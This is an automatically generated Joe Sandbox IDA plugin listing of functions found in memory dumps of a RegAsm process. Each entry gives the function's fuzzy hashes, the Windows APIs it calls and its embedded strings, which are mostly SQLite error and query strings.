Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 3784c3b86d684b00020f6c8317c88db4bea9c337dc5f495ba4d79cfbb30e6857
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: A511407604814EBBCF125F89CC41CEE3F32BF19358B588556FA1859131D33AD9B2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 0040E463 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040E468
lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
lstrcpy.KERNEL32(00000000), ref: 0040E4B7
lstrcat.KERNEL32(?,?), ref: 0040E4C2

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologlstrcatlstrcpylstrlen
String ID:
API String ID: 809291720-0
Opcode ID: 5bd464c41beb7060fe26781fd62a064241158a3b98bbfd09324de135d2f4d82a
Instruction ID: c1d13b7228f3b328fe2aa5b4acc79674b111ccd5454426d6a9c5d0fdcf5e229c
Opcode Fuzzy Hash: 5bd464c41beb7060fe26781fd62a064241158a3b98bbfd09324de135d2f4d82a
Instruction Fuzzy Hash: 38015AB2900206EFDB149F9AE88499AFBB5FF48314B10C93EE459E3250C774A9508B90

Uniqueness

Uniqueness Score: -1.00%

Function 19822ABD Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 19A21382
GetLastError.KERNEL32 ref: 19A2138E
___initconout.LIBCMT ref: 19A2139E

Part of subcall function 19A21303: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,19A213A3), ref: 19A21316

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 19A213B3

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID: ConsoleWrite$CreateErrorFileLast___initconout
String ID:
API String ID: 3431868840-0
Opcode ID: e0421d148a99e8b15b310e3c933322dc8e720617c96c96c8e4778d6119fe62b5
Instruction ID: cf66f5f1c23417264a5ff8319a6f41bdff72d0704bcb17f8866578f1fac36ada
Opcode Fuzzy Hash: e0421d148a99e8b15b310e3c933322dc8e720617c96c96c8e4778d6119fe62b5
Instruction Fuzzy Hash: 49F0373A1101B5BFCF621FB9CD459C93F7BFB447A1F564010F91C85520DA329969DB90

Uniqueness

Uniqueness Score: -1.00%

Function 1983BE80 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 314COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1983C1B5

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 9b94b1cde56c47ddd4763b45a83f643cafce249da56866879956405f13e98705
Instruction ID: 46da76ad0dee3284a4fb6b140b22c228fbc2cc841eac9be469cdb9423c72450f
Opcode Fuzzy Hash: 9b94b1cde56c47ddd4763b45a83f643cafce249da56866879956405f13e98705
Instruction Fuzzy Hash: EFA168B6D087869FD7008E29CC5132AB7D1AF99222F9C1B1DFCA1873D1E770D6858AC1

Uniqueness

Uniqueness Score: -1.00%

Function 1984DB30 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

YHI;, xrefs: 1984DB36

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: YHI;
API String ID: 0-2037931556
Opcode ID: 1a49707515c11b6712e429249a68e01c874bb591246e639a411c55bc834540ef
Instruction ID: a8013f6eddcd1169af8919ccaeaaf7e0f36da6a0448b357613ee8bad2dc877f5
Opcode Fuzzy Hash: 1a49707515c11b6712e429249a68e01c874bb591246e639a411c55bc834540ef
Instruction Fuzzy Hash: 8091E0B59043899BC710CF64CC81B9B77E8AF98354F2D492DF8889B282E739F5458792

Uniqueness

Uniqueness Score: -1.00%

Function 1986CBF0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1986CE39

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 298776caa3e611aace399f4a05c46030fa3a01b07f76efc87b71654428fe24f8
Instruction ID: 3313e6d744de4004afc552226d7f81cdeb907ff638d8ba4a4b94114477211555
Opcode Fuzzy Hash: 298776caa3e611aace399f4a05c46030fa3a01b07f76efc87b71654428fe24f8
Instruction Fuzzy Hash: C481FFB5E043058BC304CF18C881B5AB7F5AFA8310F4D492CFA859F2A2E776E945C792

Uniqueness

Uniqueness Score: -1.00%

Function 199478F0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214COMMON

Download Yara Rule

Strings

*, xrefs: 19947982
?, xrefs: 1994794A

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: *$?
API String ID: 0-2367018687
Opcode ID: 48515e089074c1ec22c4f4c07be96bb0e1b3c1b0297154e5c6a43c404302e60f
Instruction ID: e202784a8b4abaeb4ab9536126d1678dd5b1f789f4ef235ab88f7f22be864f11
Opcode Fuzzy Hash: 48515e089074c1ec22c4f4c07be96bb0e1b3c1b0297154e5c6a43c404302e60f
Instruction Fuzzy Hash: 4B71F9B06043999FD7138F28C98071FBBE9EF85200F6C496DE8C987341D775DA468792

Uniqueness

Uniqueness Score: -1.00%

Function 1983C8E0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

Strings

LIKE or GLOB pattern too complex, xrefs: 1983C94F
ESCAPE expression must be a single character, xrefs: 1983CA43

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 0-264706735
Opcode ID: cda8e214ec66bfd31576ea1447eb20526a67303e330252af7619c6523fb59f02
Instruction ID: c99147318523ac4497a3690360fc25a5ff5abd070a39c5a213a70186706b18d8
Opcode Fuzzy Hash: cda8e214ec66bfd31576ea1447eb20526a67303e330252af7619c6523fb59f02
Instruction Fuzzy Hash: 9961AAB5E142958FDB04CE26CC82F657791AB52327FAD824CEC915B2C2D736C681C3D1

Uniqueness

Uniqueness Score: -1.00%

Function 1983D0F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1983D213

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: 62c51035daca94181c67a7dc0d2dfaa0bee1cf534b8870e0caffd65d3f85618c
Instruction ID: aaf285859888a03298a7bf8dbca2e7a7e32f296c38cdebeaa340dd64777e6020
Opcode Fuzzy Hash: 62c51035daca94181c67a7dc0d2dfaa0bee1cf534b8870e0caffd65d3f85618c
Instruction Fuzzy Hash: 80415C738042454FE7108E28AC4179EBB969F61321F8C4A3DEDA9573D2E666E748C3D2

Uniqueness

Uniqueness Score: -1.00%

Function 198355D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

winDelete, xrefs: 1983569C
delayed %dms for lock/sharing conflict at line %d, xrefs: 198356D1

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: delayed %dms for lock/sharing conflict at line %d$winDelete
API String ID: 0-1405699761
Opcode ID: fe5a75f885a5306c412e14e4b93eb7e0e1edf9575c9cae4625a06af56f6da287
Instruction ID: 9f1369ee22d6b4b8d74551ed60e09fff516f8d7a7b27efa8b01161bdad93885c
Opcode Fuzzy Hash: fe5a75f885a5306c412e14e4b93eb7e0e1edf9575c9cae4625a06af56f6da287
Instruction Fuzzy Hash: 14314AB2A002618FEB102A3CDDC995A771CE750263F89463AED1FC61C1F621CA4DC6F2

Uniqueness

Uniqueness Score: -1.00%

Function 1983D300 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 103COMMON

Download Yara Rule

Strings

string or blob too big, xrefs: 1983D3D5

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: string or blob too big
API String ID: 0-2803948771
Opcode ID: c3120da2cd30a0282d6fca88af0fa2bb37c5c95fd5dbb5cbd24946fd58aaa6a4
Instruction ID: 823138e218e93bce531bdae6574f24dcc6ec6d4a57788156bb46964505ac4228
Opcode Fuzzy Hash: c3120da2cd30a0282d6fca88af0fa2bb37c5c95fd5dbb5cbd24946fd58aaa6a4
Instruction Fuzzy Hash: 73319DB69042245BD7144E28DC00B66775A9B91336F9C42ACFC556F3C2E267EE16C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00405C0B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000), ref: 00405C48

Strings

e^@, xrefs: 00405D1C, 00405D05

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: e^@
API String ID: 1029625771-3820609939
Opcode ID: ab3d73b2a095d0cd789bdf381eceaff92637ffdb2eee61bd1845d46ca7e4ea72
Instruction ID: e00f8a410b6168d8007e4af54646daa8228851e18fdeb3befff5dbae74f8fd61
Opcode Fuzzy Hash: ab3d73b2a095d0cd789bdf381eceaff92637ffdb2eee61bd1845d46ca7e4ea72
Instruction Fuzzy Hash: 7A311875601B05EBEB208F64D848BABB7E4EF44345F14887AE456EB390E738E9419F18

Uniqueness

Uniqueness Score: -1.00%

Function 1991DEE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

sqlite_stat1, xrefs: 1991DF30
SELECT tbl,idx,stat FROM %Q.sqlite_stat1, xrefs: 1991DF4F

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT tbl,idx,stat FROM %Q.sqlite_stat1$sqlite_stat1
API String ID: 0-3572622772
Opcode ID: ab70f9932438fe4e55f1be5d46efbec3fef5fb76e89442fd0151b95cb5c94db2
Instruction ID: d6230504c495d3e809bb570dff96371c6a29043a58b7ddd3b858a7508198b5a2
Opcode Fuzzy Hash: ab70f9932438fe4e55f1be5d46efbec3fef5fb76e89442fd0151b95cb5c94db2
Instruction Fuzzy Hash: 4921F275A003495FDB01EE25CC80E2AB3A8BF81630B4D416CFC849B391E321FA14C791

Uniqueness

Uniqueness Score: -1.00%

Function 199B7E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON

Download Yara Rule

Strings

OsError 0x%lx (%lu), xrefs: 199B7ED9

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: OsError 0x%lx (%lu)
API String ID: 0-3720535092
Opcode ID: 071aa57313ce1da89cddf083be61862bd7e8824b7cc149361245ce724b7d5401
Instruction ID: a9a05260a32d68db2fcf049460acce0642ec859ccd3ffd35c7ddc8a466c16444
Opcode Fuzzy Hash: 071aa57313ce1da89cddf083be61862bd7e8824b7cc149361245ce724b7d5401
Instruction Fuzzy Hash: D821DE71600260AFEB119BBCCC88F5F37ACFF00646F080528F94AD51A0DB35DA1AD7A2

Uniqueness

Uniqueness Score: -1.00%

Function 19A16DCB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,19A17496,?,?,?,?), ref: 19A16E67
GetLastError.KERNEL32(?,19A17496,?,?,?,?), ref: 19A16E8D

Strings

YHI;, xrefs: 19A16DDA

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: YHI;
API String ID: 442123175-2037931556
Opcode ID: b605b5bf560db0f20bdef41ccfd8261a82bceece20b914f0206e030bf7e0abf7
Instruction ID: dc27c48c5bae5466454740aee174398ea161516849d85b8f7952bd8f9ed662e1
Opcode Fuzzy Hash: b605b5bf560db0f20bdef41ccfd8261a82bceece20b914f0206e030bf7e0abf7
Instruction Fuzzy Hash: 80219635A002699FCB19CF29C8809D9B7BAEF48705F1441AAE909DB251D730ED4ACB60

Uniqueness

Uniqueness Score: -1.00%

Function 1982141F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON

Download Yara Rule

Strings

GetXStateFeaturesMask, xrefs: 19A00E34
InitializeCriticalSectionEx, xrefs: 19A00E84

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
